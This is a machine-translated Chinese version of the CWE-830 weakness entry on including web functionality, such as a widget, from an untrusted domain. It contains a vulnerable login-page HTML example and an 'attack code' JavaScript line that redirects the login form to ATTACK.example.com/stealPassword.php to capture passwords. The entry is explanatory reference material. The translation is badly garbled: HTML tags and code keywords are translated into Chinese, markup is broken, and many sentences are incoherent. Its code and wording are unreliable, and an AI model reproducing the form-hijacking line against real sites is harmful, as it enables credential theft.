cwe - 830:来自不受信任来源的网络功能
视图定制的信息:的用户感兴趣的更多的概念方面的一个弱点。例如:教育者,技术作家和项目/项目经理。
用户关心的实际应用和细节的本质弱点以及如何预防它的发生。例子:工具开发人员、安全人员、pen-testers事件反应分析师。
对于用户映射一个问题CWE / CAPEC id,即。,找到最合适的CWE为一个特定的问题(例如,CVE记录)。例如:工具开发人员、安全人员。
用户希望看到所有可用的信息CWE / CAPEC条目。
为用户谁想要定制显示细节。
 描述
产品包括网络功能(如web部件)从另一个域,导致其经营领域内的产品,可能给予总访问和控制产品的不可信来源。< / div >< / div >< / div > 扩展描述
的关系 此表显示了弱点和高水平类别相关的这一弱点。这些关系被定义为ChildOf、ParentOf MemberOf,并洞察类似项目可能存在的在较高和较低的抽象级别。此外,关系如PeerOf和CanAlsoBe定义显示类似的弱点,用户可能想要探索。
相关的视图”研究概念”(cwe - 1000)
此表显示了弱点和高水平类别相关的这一弱点。这些关系被定义为ChildOf、ParentOf MemberOf,并洞察类似项目可能存在的在较高和较低的抽象级别。此外,关系如PeerOf和CanAlsoBe定义显示类似的弱点,用户可能想要探索。
 相关视图”架构概念”(cwe - 1008)
模式的介绍不同模式的引入提供了信息如何以及何时可以纳入这一弱点。生命周期的阶段识别点的介绍可能发生,而相关的报告提供了一个典型的场景介绍在给定的阶段。
常见的后果这个表指定不同的个人相关后果的弱点。标识应用程序范围的安全领域侵犯,而影响了负面的技术影响,如果敌人成功利用这个弱点。可能提供的信息如何可能的具体结果预计将看到列表中相对于其它后果。例如,可能会有高可能性,缺点将被利用来实现一定的影响,但较低的可能性,它将被利用来实现不同的影响。
示范例子示例1 这个登录页面包括一个天气小部件从外部网站:
(坏的代码)
例如语言:HTML< / div >
< div class = "头" >欢迎!
< div id = " loginBox " >请登录:
<形式id = " loginForm " name = " loginForm " action = "登录。php”方法= " post " > 用户名:< input type = " text " name = "用户名" / > < br / > 密码:< input type = "密码" name = "密码" / > < input type = " submit " value = "登录" / > > < /形式 < div id = " WeatherWidget " >
<脚本type = " text / javascript“src = "externalDomain.example.com/weatherwidget.js " > < /脚本>< / div >< / div >< / div >< / div > 这个网页现在只有一样安全的外部域包括功能。如果攻击者攻陷外部域和可以添加weatherwidget恶意脚本。js文件,攻击者可以完全控制,如任何XSS的弱点(cwe - 79)。 例如,用户登录信息很容易被偷weatherwidget.js添加了一行:
(攻击代码)
例如语言:JavaScript< / div >
…天气小部件代码.... . getelementbyid (“loginForm”)。action = "ATTACK.example.com/stealPassword.php”;< / div >< / div >< / div >< / div > 这行javascript更改登录表单的原始行动目标从最初的网站,网站的攻击。因此,如果用户试图登录自己的用户名和密码将会直接发送到攻击网站。 会员资格这MemberOf关系表显示额外CWE类别和视图引用这个弱点作为成员。这些信息通常是有用的在理解一个弱点符合外部信息源的上下文中。
脆弱性映射笔记
引用
内容的历史
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
